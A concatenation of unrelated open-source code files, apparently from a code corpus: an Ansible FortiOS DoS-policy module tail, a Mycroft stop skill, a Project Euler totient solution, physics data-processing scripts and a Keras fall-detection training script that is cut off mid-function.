"username": {"required": False, "type": "str"},
"password": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": True},
"ssl_verify": {"required": False, "type": "bool", "default": True},
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"firewall_DoS_policy6": {
"required": False, "type": "dict", "default": None,
"options": {
"anomaly": {"required": False, "type": "list",
"options": {
"action": {"required": False, "type": "str",
"choices": ["pass", "block"]},
"log": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
"name": {"required": True, "type": "str"},
"quarantine": {"required": False, "type": "str",
"choices": ["none", "attacker"]},
"quarantine_expiry": {"required": False, "type": "str"},
"quarantine_log": {"required": False, "type": "str",
"choices": ["disable", "enable"]},
"status": {"required": False, "type": "str",
"choices": ["disable", "enable"]},
"threshold": {"required": False, "type": "int"},
"threshold(default)": {"required": False, "type": "int"}
}},
"comments": {"required": False, "type": "str"},
"dstaddr": {"required": False, "type": "list",
"options": {
"name": {"required": True, "type": "str"}
}},
"interface": {"required": False, "type": "str"},
"policyid": {"required": True, "type": "int"},
"service": {"required": False, "type": "list",
"options": {
"name": {"required": True, "type": "str"}
}},
"srcaddr": {"required": False, "type": "list",
"options": {
"name": {"required": True, "type": "str"}
}},
"status": {"required": False, "type": "str",
"choices": ["enable", "disable"]}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
legacy_mode = 'host' in module.params and module.params['host'] is not None and \
'username' in module.params and module.params['username'] is not None and \
'password' in module.params and module.params['password'] is not None
if not legacy_mode:
if module._socket_path:
connection = Connection(module._socket_path)
fos = FortiOSHandler(connection)
is_error, has_changed, result = fortios_firewall(module.params, fos)
else:
module.fail_json(**FAIL_SOCKET_MSG)
else:
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
fos = FortiOSAPI()
login(module.params, fos)
is_error, has_changed, result = fortios_firewall(module.params, fos)
fos.logout()
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| gpl-3.0 | 4,463,918,872,802,416,600 | 33.621277 | 157 | 0.505101 | false |
ssmruthi/mycroft-core | mycroft/skills/stop/__init__.py | 1 | 1465 | # Copyright 2016 Mycroft AI, Inc.
#
# This file is part of Mycroft Core.
#
# Mycroft Core is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Mycroft Core is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Mycroft Core. If not, see <http://www.gnu.org/licenses/>.
from adapt.intent import IntentBuilder
from os.path import dirname, join
from mycroft.messagebus.message import Message
from mycroft.skills.core import MycroftSkill
from mycroft.util.log import getLogger
__author__ = 'jdorleans'
LOGGER = getLogger(__name__)
class StopSkill(MycroftSkill):
def __init__(self):
super(StopSkill, self).__init__(name="StopSkill")
def initialize(self):
# TODO - To be generalized in MycroftSkill
intent = IntentBuilder("StopIntent").require("StopKeyword").build()
self.register_intent(intent, self.handle_intent)
def handle_intent(self, event):
self.emitter.emit(Message("mycroft.stop"))
def stop(self):
pass
def create_skill():
return StopSkill()
| gpl-3.0 | 6,920,087,115,239,575,000 | 29.520833 | 75 | 0.724232 | false |
fbcom/project-euler | 072_counting_fractions.py | 1 | 1188 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# A Solution to "Counting fractions" – Project Euler Problem No. 72
# by Florian Buetow
#
# Sourcecode: https://github.com/fbcom/project-euler
# Problem statement: https://projecteuler.net/problem=72
def get_distinct_prime_factors(n):
ret = []
if n > 1:
for d in [2] + range(3, 1+int(n**0.5), 2):
if n % d == 0:
ret.append(d)
while n % d == 0:
n = n / d
if n <= 1:
break
if n > 1:
ret.append(n)
return ret
def phi(n):
# Euler's totient function:
# phi(n) := counts how many numbers k < n have gcd(n,k) = 1
ret = n
for p in get_distinct_prime_factors(n):
ret = ret - ret / p
return ret
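# Illustrative check (in the same spirit as the testcase below): phi(10) == 4,
# since 1, 3, 7 and 9 are the only positive integers below 10 coprime to 10.
assert phi(10) == 4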
def count_reduced_proper_fractions(limit):
# turns out the solution is equal to the sum of phi(i) for i in [2,...,limit]
ret = 0
for n in range(2, limit+1):
ret += phi(n)
return ret
# Testcase
assert count_reduced_proper_fractions(8) == 21, "Testcase failed"
# Solve
limit = 1000*1000 # one million
solution = count_reduced_proper_fractions(limit)
print "Solution:", solution
| mit | -8,231,899,438,116,633,000 | 23.708333 | 81 | 0.572513 | false |
aolindahl/epicea | straighten_lines.py | 1 | 4479 | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 29 15:34:36 2015
@author: antlin
"""
import numpy as np
import matplotlib.pyplot as plt
import lmfit
import epicea
import electron_calibration_data
import plt_func
line_model = epicea.electron_calibration_helper.n_line_fit_model
line = 'voigt'
data_list = electron_calibration_data.get_data_in_list('357', True)
r_axis_mm = np.linspace(0, 25, 2**9+1)[1::2]
th_axis_rad = np.linspace(0, 2*np.pi, 2**9+1)[1::2]
th_limits = epicea.limits_from_centers(th_axis_rad)
# data = data_list[0]
for data in data_list:
r_th_img = data.get_e_rth_image(r_axis_mm, th_axis_rad)[0]
r_proj = r_th_img.sum(axis=0)
proj_params_initial = epicea.electron_calibration_helper.start_params(
r_axis_mm, r_proj, n_lines=2)
proj_result = lmfit.minimize(line_model,
proj_params_initial,
args=(r_axis_mm, r_proj),
kws={'line_type': line})
r_th_fig = plt_func.figure_wrapper('theta - r ' + data.name())
ax_origaninl = plt.subplot(221)
plt_func.imshow_wrapper(r_th_img,
r_axis_mm, th_axis_rad,
kw_args={'aspect': 'auto'})
plt_func.colorbar_wrapper()
ax_origaninl.autoscale(False)
plt.subplot(223)
plt.plot(r_axis_mm, r_proj)
plt.plot(r_axis_mm, line_model(proj_result.params, r_axis_mm,
line_type=line), '--')
centers = (r_th_img * r_axis_mm).sum(axis=1) / r_th_img.sum(axis=1)
# radial_factors = centers.mean()/centers
# Find the center of the first line
low_radius_centers = np.empty_like(centers)
for i_th in range(len(th_axis_rad)):
y = r_th_img[i_th, :]
i_min = r_axis_mm.searchsorted(centers[i_th])
while y[i_min] > y[i_min - 1]:
i_min -= 1
while y[i_min] > y[i_min+1]:
i_min += 1
I_low_radius = (((centers[i_th] - 3) <= r_axis_mm) &
(r_axis_mm <= centers[i_th]))
low_radius_centers[i_th] = ((r_th_img[i_th, I_low_radius] *
r_axis_mm[I_low_radius]).sum() /
r_th_img[i_th, I_low_radius].sum())
radial_factors = low_radius_centers.mean() / low_radius_centers
ax_origaninl.plot(centers, th_axis_rad, 'm')
ax_origaninl.plot(low_radius_centers, th_axis_rad, 'c')
plt_func.figure_wrapper('centers ' + data.name())
plt.subplot(121)
plt.plot(centers, th_axis_rad, label='full center')
plt.plot(low_radius_centers, th_axis_rad, label='first center')
plt.title('center position')
plt_func.legend_wrapper()
plt.subplot(122)
plt.plot(radial_factors, th_axis_rad)
plt.title('r factors')
r = data.electrons.pos_r.value
th = data.electrons.pos_t.value
for i in range(len(th_axis_rad)):
selection = (th_limits[i] < th) & (th < th_limits[i+1])
r[selection] *= radial_factors[i]
r_th_img_corrected = epicea.center_histogram_2d(r, th, r_axis_mm,
th_axis_rad)
r_proj_corrected = r_th_img_corrected.sum(axis=0)
proj_corrected_params_initial = \
epicea.electron_calibration_helper.start_params(
r_axis_mm, r_proj_corrected, n_lines=2)
proj_corrected_result = lmfit.minimize(line_model,
proj_corrected_params_initial,
args=(r_axis_mm, r_proj_corrected),
kws={'line_type': line})
ax = r_th_fig.add_subplot(222)
plt.sca(ax)
plt_func.imshow_wrapper(r_th_img_corrected,
r_axis_mm, th_axis_rad,
kw_args={'aspect': 'auto'})
axis = plt.axis()
plt.plot(centers * radial_factors * np.ones_like(th_axis_rad),
th_axis_rad, 'm')
plt.plot(low_radius_centers.mean() * np.ones_like(th_axis_rad),
th_axis_rad, 'm')
plt_func.colorbar_wrapper()
plt.sca(r_th_fig.add_subplot(224))
plt.plot(r_axis_mm, r_proj_corrected)
plt.plot(r_axis_mm, line_model(proj_corrected_result.params, r_axis_mm,
line_type=line), '--')
plt_func.figure_wrapper('waterfall ' + data.name())
for i in range(len(th_axis_rad)):
plt.plot(r_axis_mm, r_th_img[i, :] + i * 20)
r_th_fig.tight_layout()
| gpl-2.0 | 8,085,153,324,896,847,000 | 35.120968 | 78 | 0.553472 | false |
siberianisaev/NeutronBarrel | Neutrons preprocessing/neutron_preprocessing.py | 1 | 5365 | import pandas as pd
import numpy as np
class ExpProcessing:
"""
class for preprocessed neutrons experiment data
"""
def __init__(self, counts_measured):
"""
Input : counts_measured - list (or any numpy convertible type)
Method creates a data frame with experimental counts, its errors,
normed values and its errors, mean and variance of the spectra
The data frame consists the next columns:
["bin", "count", "count_error", "probability", "probability_error",
"relative_error", "mean", "mean_error", "variance"]
"""
self._data = pd.DataFrame(columns=["bin", "count", "count_error", "probability",
"probability_error", "relative_error",
"mean", "mean_error", "variance"])
if not isinstance(counts_measured, np.ndarray):
try:
counts_measured = np.array(counts_measured)
except TypeError:
raise TypeError("count_measured must be an array or any numpy convertible type")
if counts_measured.size < 10:
counts_measured = np.pad(counts_measured, (0, 10 - counts_measured.size))
self._data["bin"] = [i for i in range(counts_measured.size)]
self._data["count"] = counts_measured
self._data["count_error"] = self.count_error_calculation()
self._data["relative_error"] = self._data["count_error"] / self._data["count"]
self._data["probability"], self._data["probability_error"] = self.normalization()
self._data["mean"] = self.mean_calculation()
self._data["mean_error"] = self.calculate_error_of_mean()
self._data["variance"] = self.variance_calculation()
def count_error_calculation(self):
"""
Method returns errors of experimental points s
s = sqrt(N) / sqrt(k), for k >= 1
s = sqrt(N) for k = 0
where N - counts of events with multiplicity k,
k - multiplicity of event
:return: array of absolute errors
"""
counts, bins = self._data["count"], self._data["bin"]
return [(N / k) ** 0.5 if k > 1 else N ** 0.5 for N, k in zip(counts, bins)]
def normalization(self):
"""
Method converts experimental points and errors to
probability of neutron emission and its errors
:return: two arrays: array of neutron emissions probability and its errors
"""
counts = self._data["count"]
count_errors = self._data["count_error"]
total = counts.sum()
return counts / total, count_errors / total
def mean_calculation(self):
"""
Method calculates mean value of experimental spectra
mean = total_neutrons / total_events
:return: mean value
"""
bins = self._data["bin"]
counts = self._data["count"]
return bins.dot(counts).sum() / counts.sum()
def variance_calculation(self):
"""
Method calculates variance of experimental spectra
variance = mean()**2 - mean(data**2)
:return: variance
"""
bins, counts = self._data["bin"], self._data["count"]
mx2 = (bins*bins).dot(counts).sum() / counts.sum()
m = self._data["mean"][0]
return mx2 - m * m
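    # Illustrative numbers (hypothetical input, not from a real measurement):
    # for counts [10, 20, 30] over multiplicities 0, 1, 2 the mean is
    # 80/60 ~ 1.33 and the variance is 140/60 - (80/60)**2 ~ 0.56.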
def get_data(self):
"""
Method returns the data in pandas.DataFrame format
:return: pandas.DataFrame object
"""
return self._data
def to_csv(self, filename=""):
"""
Method saves all calculated data to .csv file
with name 'filename'
        :param filename: optional, name of file, default is 'neutrons_{current_date_and_time}.csv'
"""
if filename == "":
from datetime import datetime
now = datetime.now().strftime("%Y_%m_%d_%H_%M")
filename = f"neutrons_{now}.csv"
try:
self._data.to_csv(filename, index=False, header=True)
print(filename + " was saved successfully")
except FileNotFoundError as ex:
print("########\n# No such directory! Unsuccessful writing!\n########")
def calculate_error_of_mean(self):
"""
Method calculates the statistical error of measured mean value.
dM^2= (dN / E)^2 + (N * dE / E^2)^2
dM - mean error
N, dN - number of neutrons and its error (dN = sqrt(N))
E, dE - number of events and its error (dE = sqrt(E))
:return: dM, error of measured mean value
"""
total_events = self._data["count"].sum()
total_neutrons = self._data["count"].dot(self._data["bin"]).sum()
delta_events = total_events ** 0.5
delta_neutrons = total_neutrons ** 0.5
delta_mean_sq = (delta_neutrons / total_events)**2 + \
(total_neutrons * delta_events / total_events**2)**2
return delta_mean_sq ** 0.5
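    # Worked example under the same hypothetical counts [10, 20, 30]:
    # E = 60 events, N = 80 neutrons, so dM = sqrt((sqrt(80)/60)**2 +
    # (80*sqrt(60)/60**2)**2) ~ 0.23.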
if __name__ == "__main__":
folder = "csv_05_2021/"
file = "Fm244" + ".csv"
a = [10, 20, 30]
pd.set_option('display.max_columns', None)
b = ExpProcessing(a)
print(b.get_data())
print(b.calculate_error_of_mean())
# b.to_csv(folder + file)
| mit | -5,235,752,218,111,256,000 | 38.954198 | 97 | 0.555266 | false |
Rafael-Cheng/MovieReviewCrawlers | broad crawler/MovieReview/MovieReview/spiders/MovieReviewSpider.py | 1 | 4028 | # -*- encoding:utf-8 -*-
import sys
import scrapy
from MovieReview.items import MoviereviewItem
from scrapy_redis.spiders import RedisSpider
from scrapy.http import Request, HtmlResponse
from scrapy.linkextractors import LinkExtractor
from scrapy.selector import Selector
from bs4 import BeautifulSoup
from obtain_date import obtain_date
reload(sys)
sys.setdefaultencoding('utf-8')
class MovieReviewSpider(scrapy.Spider):
name = "movie"
start_urls = ['http://maoyan.com/news?showTab=2']
# generate navigation page urls
def parse(self, response):
num_of_a = 0
leaf_divs = []
div_lenOfa = []
yield scrapy.Request(response.url, callback=self.extractLinks)
divs = response.xpath('//div')
# find leaf divs
for div in divs:
if len(div.xpath('.//div').extract()) == 0:
leaf_divs.append(div)
# calculate the number of a tags in a div
for div in leaf_divs:
div_lenOfa.append((div, len(div.xpath('.//a'))))
# sort by the number of tags
nav_divs = sorted(div_lenOfa, key=lambda tup:tup[1], reverse=True)
divs = response.xpath('./div').extract()
# locate page number tag
for div in nav_divs:
txt_in_a_tag = div[0].xpath('.//a/text()').extract()
if len(txt_in_a_tag) == 0:
continue
if txt_in_a_tag[-1] == '下一页':
url_next_page = div[0].xpath('.//a/@href').extract()[-1]
url = response.urljoin(url_next_page)
yield scrapy.Request(url, callback=self.parse)
def extractLinks(self, response):
div_lenDiv = []
comment_urls = []
divs = response.xpath('//div')
for div in divs:
div_lenDiv.append([div, len(div.xpath('./div'))])
sorted_divs = sorted(div_lenDiv, key=lambda div_lenDiv:div_lenDiv[1], reverse=True)
urls = sorted_divs[0][0].xpath('.//a/@href').extract()
for url in urls:
complete_url = response.urljoin(url)
if complete_url not in comment_urls:
comment_urls.append(complete_url)
for url in comment_urls:
yield scrapy.Request(url=url, callback=self.parsePage)
# parse specific pages
def parsePage(self, response):
item = MoviereviewItem()
div_lenOfP = []
try:
title = ''
title = ''.join(response.xpath('//h1/text()').extract_first().split())
except AttributeError as e:
if title == None or title == '':
return
url = str(response.url).replace('http://', '').\
replace('https://', '').replace('www.', '')
source = url.split('.')[0]
divs = response.xpath('//div')
for div in divs:
div_lenOfP.append([div, len(div.xpath('./p'))])
sorted_divs = sorted(div_lenOfP, key=lambda div_lenOfP:div_lenOfP[1], reverse=True)
content_div = sorted_divs[0][0]
content = ''.join(content_div.xpath('.//p/text()').extract())
# imgs = [x for x in content_div.xpath('.//img/@src').extract()]
# hashed_images = [hash(x) for x in imgs]
item['Url'] = response.url
item['Title'] = title
item['Source'] = source
item['Time'] = obtain_date(response)
# item['Images'] = str(hashed_images)
item['Content'] = content
# item['image_urls'] = imgs
yield item
def determineMain(div, tag):
    # Recursively search for the div that contains the largest number of
    # direct <tag> children and return it together with that count.
    maxTag = 0
    bestDiv = div
    divs = div.xpath('./div')
    for _div in divs:
        retDiv, noOfTag = determineMain(_div, tag)
        if noOfTag > maxTag:
            maxTag = noOfTag
            bestDiv = retDiv
    search_string = './' + tag
    noOfDiv = len(div.xpath(search_string).extract())
    if maxTag < noOfDiv:
        maxTag = noOfDiv
        bestDiv = div
    return bestDiv, maxTag
| gpl-3.0 | 8,782,475,459,918,302,000 | 35.563636 | 91 | 0.55644 | false |
AdrianNunez/Fall-Detection-with-CNNs-and-Optical-Flow | temporalnet_combined.py | 1 | 25869 | from __future__ import print_function
from numpy.random import seed
seed(1)
import numpy as np
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
import os
import h5py
import scipy.io as sio
import cv2
import glob
import gc
from keras.models import load_model, Model, Sequential
from keras.layers import (Input, Conv2D, MaxPooling2D, Flatten,
Activation, Dense, Dropout, ZeroPadding2D)
from keras.optimizers import Adam
from keras.layers.normalization import BatchNormalization
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras import backend as K
from sklearn.metrics import confusion_matrix, accuracy_score
from sklearn.model_selection import KFold, StratifiedShuffleSplit
from keras.layers.advanced_activations import ELU
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]="3"
# CHANGE THESE VARIABLES ---
mean_file = '/home/anunez/flow_mean.mat'
vgg_16_weights = 'weights.h5'
save_plots = True
# Set to 'True' if you want to restore a previous trained models
# Training is skipped and test is done
use_checkpoint = True
# --------------------------
best_model_path = 'models/'
plots_folder = 'plots/'
checkpoint_path = best_model_path + 'fold_'
saved_files_folder = 'saved_features/'
features_file = {
'urfd': saved_files_folder + 'features_urfd_tf.h5',
'multicam': saved_files_folder + 'features_multicam_tf.h5',
'fdd': saved_files_folder + 'features_fdd_tf.h5',
}
labels_file = {
'urfd': saved_files_folder + 'labels_urfd_tf.h5',
'multicam': saved_files_folder + 'labels_multicam_tf.h5',
'fdd': saved_files_folder + 'labels_fdd_tf.h5',
}
features_key = 'features'
labels_key = 'labels'
L = 10
num_features = 4096
batch_norm = True
learning_rate = 0.01
mini_batch_size = 2048
weight_0 = 2
epochs = 1000
use_validation = True
# After the training stops, use train+validation to train for 1 epoch
use_val_for_training = False
val_size = 200
# Threshold to classify between positive and negative
threshold = 0.5
# Name of the experiment
exp = 'multicam_lr{}_batchs{}_batchnorm{}_w0_{}'.format(
learning_rate,
mini_batch_size,
batch_norm,
weight_0
)
def plot_training_info(case, metrics, save, history):
'''
Function to create plots for train and validation loss and accuracy
Input:
* case: name for the plot, an 'accuracy.png' or 'loss.png'
will be concatenated after the name.
* metrics: list of metrics to store: 'loss' and/or 'accuracy'
* save: boolean to store the plots or only show them.
* history: History object returned by the Keras fit function.
'''
val = False
if 'val_acc' in history and 'val_loss' in history:
val = True
plt.ioff()
if 'accuracy' in metrics:
fig = plt.figure()
plt.plot(history['acc'])
if val: plt.plot(history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
if val:
plt.legend(['train', 'val'], loc='upper left')
else:
plt.legend(['train'], loc='upper left')
if save == True:
plt.savefig(case + 'accuracy.png')
plt.gcf().clear()
else:
plt.show()
plt.close(fig)
# summarize history for loss
if 'loss' in metrics:
fig = plt.figure()
plt.plot(history['loss'])
if val: plt.plot(history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
#plt.ylim(1e-3, 1e-2)
plt.yscale("log")
if val:
plt.legend(['train', 'val'], loc='upper left')
else:
plt.legend(['train'], loc='upper left')
if save == True:
plt.savefig(case + 'loss.png')
plt.gcf().clear()
else:
plt.show()
plt.close(fig)
def sample_from_dataset(X, y, zeroes, ones):
    '''
    Samples the rows of X and y whose indices are listed in the arrays
    zeroes and ones.
    Input:
    * X: array of features
    * y: array of labels
    * zeroes: indices of samples labelled as class 0 in y
    * ones: indices of samples labelled as class 1 in y
    Output: the sampled features and labels (class 0 rows first).
    '''
indices = np.concatenate([zeroes, ones], axis=0)
sampled_X = X[indices]
sampled_y = y[indices]
return sampled_X, sampled_y
def divide_train_val(zeroes, ones, val_size):
""" sss = StratifiedShuffleSplit(n_splits=1,
test_size=val_size/2,
random_state=7)
indices_0 = sss.split(np.zeros(len(zeroes)), zeroes)
indices_1 = sss.split(np.zeros(len(ones)), ones)
train_indices_0, val_indices_0 = indices_0.next()
train_indices_1, val_indices_1 = indices_1.next() """
rand0 = np.random.permutation(len(zeroes))
train_indices_0 = zeroes[rand0[val_size//2:]]
val_indices_0 = zeroes[rand0[:val_size//2]]
rand1 = np.random.permutation(len(ones))
train_indices_1 = ones[rand1[val_size//2:]]
val_indices_1 = ones[rand1[:val_size//2]]
return (train_indices_0, train_indices_1,
val_indices_0, val_indices_1)
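# Illustrative shapes (hypothetical sizes, not from the datasets above): with
# 1000 indices per class and val_size=200, divide_train_val keeps 900 training
# and 100 validation indices for each class, drawn via a random permutation.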
def main():
# ========================================================================
# VGG-16 FEATURE EXTRACTOR
# ========================================================================
model = Sequential()
model.add(ZeroPadding2D((1, 1), input_shape=(224, 224, 20)))
model.add(Conv2D(64, (3, 3), activation='relu', name='conv1_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(64, (3, 3), activation='relu', name='conv1_2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(128, (3, 3), activation='relu', name='conv2_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(128, (3, 3), activation='relu', name='conv2_2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(256, (3, 3), activation='relu', name='conv3_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(256, (3, 3), activation='relu', name='conv3_2'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(256, (3, 3), activation='relu', name='conv3_3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(512, (3, 3), activation='relu', name='conv4_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(512, (3, 3), activation='relu', name='conv4_2'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(512, (3, 3), activation='relu', name='conv4_3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(512, (3, 3), activation='relu', name='conv5_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(512, (3, 3), activation='relu', name='conv5_2'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(512, (3, 3), activation='relu', name='conv5_3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(Flatten())
model.add(Dense(num_features, name='fc6',
kernel_initializer='glorot_uniform'))
# ========================================================================
# WEIGHT INITIALIZATION
# ========================================================================
layerscaffe = ['conv1_1', 'conv1_2', 'conv2_1', 'conv2_2', 'conv3_1',
'conv3_2', 'conv3_3', 'conv4_1', 'conv4_2', 'conv4_3',
'conv5_1', 'conv5_2', 'conv5_3', 'fc6', 'fc7', 'fc8']
h5 = h5py.File(vgg_16_weights, 'r')
layer_dict = dict([(layer.name, layer) for layer in model.layers])
# Copy the weights stored in the 'vgg_16_weights' file to the
# feature extractor part of the VGG16
for layer in layerscaffe[:-3]:
w2, b2 = h5['data'][layer]['0'], h5['data'][layer]['1']
w2 = np.transpose(np.asarray(w2), (2,3,1,0))
w2 = w2[::-1, ::-1, :, :]
b2 = np.asarray(b2)
layer_dict[layer].set_weights((w2, b2))
# Copy the weights of the first fully-connected layer (fc6)
layer = layerscaffe[-3]
w2, b2 = h5['data'][layer]['0'], h5['data'][layer]['1']
w2 = np.transpose(np.asarray(w2), (1,0))
b2 = np.asarray(b2)
layer_dict[layer].set_weights((w2, b2))
# =============================================================================================================
# TRAINING
# =============================================================================================================
adam = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999,
epsilon=1e-08)
model.compile(optimizer=adam, loss='categorical_crossentropy',
metrics=['accuracy'])
compute_metrics = False
compute_roc_curve = False
threshold = 0.5
e = EarlyStopping(monitor='val_loss', min_delta=0, patience=100, verbose=0, mode='auto')
# Load features and labels per dataset
h5features_multicam = h5py.File(features_file['multicam'], 'r')
h5labels_multicam = h5py.File(labels_file['multicam'], 'r')
h5features_urfd = h5py.File(features_file['urfd'], 'r')
h5labels_urfd = h5py.File(labels_file['urfd'], 'r')
h5features_fdd = h5py.File(features_file['fdd'], 'r')
h5labels_fdd = h5py.File(labels_file['fdd'], 'r')
# Load Multicam data in a single array
stages = []
for i in range(1,25):
stages.append('chute{:02}'.format(i))
_x = []
_y = []
for nb_stage, stage in enumerate(stages):
for nb_cam, cam in enumerate(h5features_multicam[stage].keys()):
for key in h5features_multicam[stage][cam].keys():
_x.extend([x for x in h5features_multicam[stage][cam][key]])
_y.extend([x for x in h5labels_multicam[stage][cam][key]])
""" _x.append(np.asarray(h5features_multicam[stage][cam][key]))
_y.append(np.asarray(h5labels_multicam[stage][cam][key])) """
# Load all the datasets into numpy arrays
X_multicam = np.asarray(_x)
y_multicam = np.asarray(_y)
X_urfd = np.asarray(h5features_urfd['features'])
y_urfd = np.asarray(h5labels_urfd['labels'])
X_fdd = np.asarray(h5features_fdd['features'])
y_fdd = np.asarray(h5labels_fdd['labels'])
# Get the number of samples per class on the smallest dataset: URFD
size_0 = np.asarray(np.where(y_urfd==0)[0]).shape[0]
size_1 = np.asarray(np.where(y_urfd==1)[0]).shape[0]
# Undersample the FDD and Multicam: take 0s and 1s per dataset and
# undersample each of them separately by random sampling without replacement
# Step 1
all0_multicam = np.asarray(np.where(y_multicam==0)[0])
all1_multicam = np.asarray(np.where(y_multicam==1)[0])
all0_urfd = np.asarray(np.where(y_urfd==0)[0])
all1_urfd = np.asarray(np.where(y_urfd==1)[0])
all0_fdd = np.asarray(np.where(y_fdd==0)[0])
all1_fdd = np.asarray(np.where(y_fdd==1)[0])
# Step 2
all0_multicam = np.random.choice(all0_multicam, size_0, replace=False)
all1_multicam = np.random.choice(all1_multicam, size_0, replace=False)
all0_urfd = np.random.choice(all0_urfd, size_0, replace=False)
all1_urfd = np.random.choice(all1_urfd, size_0, replace=False)
all0_fdd = np.random.choice(all0_fdd, size_0, replace=False)
all1_fdd = np.random.choice(all1_fdd, size_0, replace=False)
# Arrays to save the results
sensitivities = { 'combined': [], 'multicam': [], 'urfd': [], 'fdd': [] }
specificities = { 'combined': [], 'multicam': [], 'urfd': [], 'fdd': [] }
# Use a 5 fold cross-validation
kfold = KFold(n_splits=5, shuffle=True)
kfold0_multicam = kfold.split(all0_multicam)
kfold1_multicam = kfold.split(all1_multicam)
kfold0_urfd = kfold.split(all0_urfd)
kfold1_urfd = kfold.split(all1_urfd)
kfold0_fdd = kfold.split(all0_fdd)
kfold1_fdd = kfold.split(all1_fdd)
# CROSS-VALIDATION: Stratified partition of the dataset into
# train/test sets
for fold in range(5):
# Get the train and test indices, then get the actual indices
_train0_multicam, _test0_multicam = kfold0_multicam.next()
_train1_multicam, _test1_multicam = kfold1_multicam.next()
train0_multicam = all0_multicam[_train0_multicam]
train1_multicam = all1_multicam[_train1_multicam]
test0_multicam = all0_multicam[_test0_multicam]
test1_multicam = all1_multicam[_test1_multicam]
_train0_urfd, _test0_urfd = kfold0_urfd.next()
_train1_urfd, _test1_urfd = kfold1_urfd.next()
train0_urfd = all0_urfd[_train0_urfd]
train1_urfd = all1_urfd[_train1_urfd]
test0_urfd = all0_urfd[_test0_urfd]
test1_urfd = all1_urfd[_test1_urfd]
_train0_fdd, _test0_fdd = kfold0_fdd.next()
_train1_fdd, _test1_fdd = kfold1_fdd.next()
train0_fdd = all0_fdd[_train0_fdd]
train1_fdd = all1_fdd[_train1_fdd]
test0_fdd = all0_fdd[_test0_fdd]
test1_fdd = all1_fdd[_test1_fdd]
if use_validation:
# Multicam
(train0_multicam, train1_multicam,
val0_multicam, val1_multicam) = divide_train_val(
train0_multicam, train1_multicam, val_size//3
)
temp = np.concatenate((val0_multicam, val1_multicam))
X_val_multicam = X_multicam[temp]
y_val_multicam = y_multicam[temp]
# URFD
(train0_urfd, train1_urfd,
val0_urfd, val1_urfd) = divide_train_val(
train0_urfd, train1_urfd, val_size//3
)
temp = np.concatenate((val0_urfd, val1_urfd))
X_val_urfd = X_urfd[temp]
y_val_urfd = y_urfd[temp]
# FDD
(train0_fdd, train1_fdd,
val0_fdd, val1_fdd) = divide_train_val(
train0_fdd, train1_fdd, val_size//3
)
temp = np.concatenate((val0_fdd, val1_fdd))
X_val_fdd = X_fdd[temp]
y_val_fdd = y_fdd[temp]
# Join all the datasets
X_val = np.concatenate(
(X_val_multicam, X_val_urfd, X_val_fdd), axis=0
)
y_val = np.concatenate(
(y_val_multicam, y_val_urfd, y_val_fdd), axis=0
)
# Sampling
X_train_multicam, y_train_multicam = sample_from_dataset(
X_multicam, y_multicam, train0_multicam, train1_multicam
)
X_train_urfd, y_train_urfd = sample_from_dataset(
X_urfd, y_urfd, train0_urfd, train1_urfd
)
X_train_fdd, y_train_fdd = sample_from_dataset(
X_fdd, y_fdd, train0_fdd, train1_fdd
)
# Create the evaluation folds for each dataset
X_test_multicam, y_test_multicam = sample_from_dataset(
X_multicam, y_multicam, test0_multicam, test1_multicam
)
X_test_urfd, y_test_urfd = sample_from_dataset(
X_urfd, y_urfd, test0_urfd, test1_urfd
)
X_test_fdd, y_test_fdd = sample_from_dataset(
X_fdd, y_fdd, test0_fdd, test1_fdd
)
# Join all the datasets
X_train = np.concatenate(
(X_train_multicam, X_train_urfd, X_train_fdd), axis=0
)
y_train = np.concatenate(
(y_train_multicam, y_train_urfd, y_train_fdd), axis=0
)
X_test = np.concatenate(
(X_test_multicam, X_test_urfd, X_test_fdd), axis=0
)
y_test = np.concatenate(
(y_test_multicam, y_test_urfd, y_test_fdd), axis=0
)
# =============================================================
# CLASSIFIER
# =============================================================
extracted_features = Input(
shape=(num_features,), dtype='float32', name='input'
)
x = BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001)(
extracted_features
)
x = Activation('relu')(x)
x = Dropout(0.9)(x)
x = Dense(4096, name='fc2', init='glorot_uniform')(x)
